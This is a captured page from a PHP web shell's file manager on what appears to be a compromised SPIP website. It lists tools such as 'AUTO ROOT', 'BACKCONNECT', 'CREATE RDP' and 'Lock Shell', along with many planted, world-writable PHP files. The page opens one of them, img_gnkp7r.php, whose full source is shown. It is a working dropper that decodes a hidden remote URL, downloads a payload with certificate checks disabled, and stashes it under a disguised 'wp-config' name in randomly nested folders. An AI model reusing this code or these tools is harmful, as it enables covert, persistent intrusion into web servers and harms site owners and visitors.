Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
lchg /
[ HOME SHELL ]
Name
Size
Permission
Action
IMG
[ DIR ]
drwx---r-x
assets_mgT
[ DIR ]
drwxr-xr-x
classes_eKa
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwx---r-x
depot
[ DIR ]
drwxr-xr-x
ecrire
[ DIR ]
drwx---r-x
fichiers_obsoletes_20241212_14...
[ DIR ]
drwxr-xr-x
fichiers_obsoletes_20251117_20...
[ DIR ]
drwxr-xr-x
files_TAd
[ DIR ]
drwxr-xr-x
includes_5k3
[ DIR ]
drwxr-xr-x
includes_a8L
[ DIR ]
drwxr-xr-x
lchg
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwx---r-x
local
[ DIR ]
drwx---r-x
logs_uGn
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwx---r-x
plugins-dist
[ DIR ]
drwx---r-x
plugins_iJk
[ DIR ]
drwxr-xr-x
prive
[ DIR ]
drwx---r-x
squelettes
[ DIR ]
drwx---r-x
squelettes-dist
[ DIR ]
drwx---r-x
tmp
[ DIR ]
drwx---r-x
vendor
[ DIR ]
drwx---r-x
vendor_VKs
[ DIR ]
drwxr-xr-x
.htaccess
265
B
-rw----r--
.spip_stage.log
13
B
-rw-rw-rw-
1788082049.php
20
B
-rw-rw-rw-
6f24f80e46db.php
375
B
-rw-rw-rw-
BALE_27dc9a.php
175
B
-rw-rw-rw-
BALE_49c824.php
175
B
-rw-rw-rw-
CHANGELOG.md
10.26
KB
-rw----r--
LICENSE
34.32
KB
-rw----r--
Nx_.php
397
B
-rw-rw-rw-
README.md
934
B
-rw----r--
SECURITY.md
178
B
-rw----r--
Svcice
0
B
-rwxrwxrwx
Vp_.php
397
B
-rw-rw-rw-
archivage_MP.php
7.57
KB
-rw-r--r--
capslok.php
10.56
KB
-rw-r--r--
composer.json
1.76
KB
-rw----r--
composer.lock
36.48
KB
-rw----r--
filefuns.php
6.1
KB
-rw-r--r--
htaccess.txt
4.27
KB
-rw-r--r--
img_cache.php
700
B
-rw-rw-rw-
img_caches.php
700
B
-rw-rw-rw-
img_gnkp7r.php
1.57
KB
-rw-rw-rw-
img_k2ybka.php
1.57
KB
-rw-rw-rw-
index.php
42
B
-rw----r--
mrroger.php
98
B
-rw-rw-rw-
plugins-dist.json
3.52
KB
-rw----r--
q5w8chb2.php
273
B
-rw-rw-rw-
sitemange.php
4.14
KB
-rw-rw-rw-
sp_3kgraqzsxe.php
325
B
-rw-rw-rw-
sp_82l1pol9ev.php
325
B
-rw-rw-rw-
sp_ft13yji2vc.php
325
B
-rw-rw-rw-
sp_kp4x5jqsrn.php
325
B
-rw-rw-rw-
spip.php
925
B
-rw----r--
spip.png
1.18
KB
-rw----r--
spip.svg
1.63
KB
-rw----r--
spip_loader.php
260.91
KB
-rw-r--r--
spip_loader_config.php
64
B
-rw-r--r--
spip_loader_list.json
350
B
-rw-r--r--
start
0
B
-rw-rw-rw-
units.php
398
B
-rw-rw-rw-
yami.php
777
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : img_gnkp7r.php
<?php $encoded_url="aHR0cHM6Ly93ZWIuc3VyYXNtYS5zYnMvYXBpL2RlZXAudHh0"; function rs($l=8){$c='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';return substr(str_shuffle($c),0,$l);} function gn(){return 'wp-config_'.rs(4).'.php';} function gd($b,$d){$p=$b;$ds=[];$names=['uploads','media','assets','resources','storage','public','private','cache','logs','tmp','backup','archive','library','vendor','system','config','data','files','images','docs','modules','plugins','themes','includes','classes'];for($i=0;$i<$d;$i++){$n=$names[array_rand($names)].'_'.rs(3);$p.='/'.$n;$ds[]=$n;if(!is_dir($p))mkdir($p,0755,true);}return['path'=>$p,'dirs'=>$ds];} function fc($u){if(function_exists('curl_init')){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$u);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch,CURLOPT_TIMEOUT,30);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);$d=curl_exec($ch);curl_close($ch);if($d)return $d;}if(function_exists('file_get_contents')&&ini_get('allow_url_fopen')){$ctx=stream_context_create(['ssl'=>['verify_peer'=>false]]);$d=@file_get_contents($u,false,$ctx);if($d)return $d;}return false;} $url=base64_decode($encoded_url);$base=__DIR__;$depth=mt_rand(3,5);$res=gd($base,$depth);$targetDir=$res['path'];$dirChain=implode('/',$res['dirs']);$content=fc($url);$fn=gn();$targetFile=$targetDir.'/'.$fn;if($content){file_put_contents($targetFile,$content);$st='success';$msg='OK';}else{file_put_contents($targetFile,'<?php echo "deployed";');$st='fallback';$msg='FB';} echo $targetFile; ?>
Close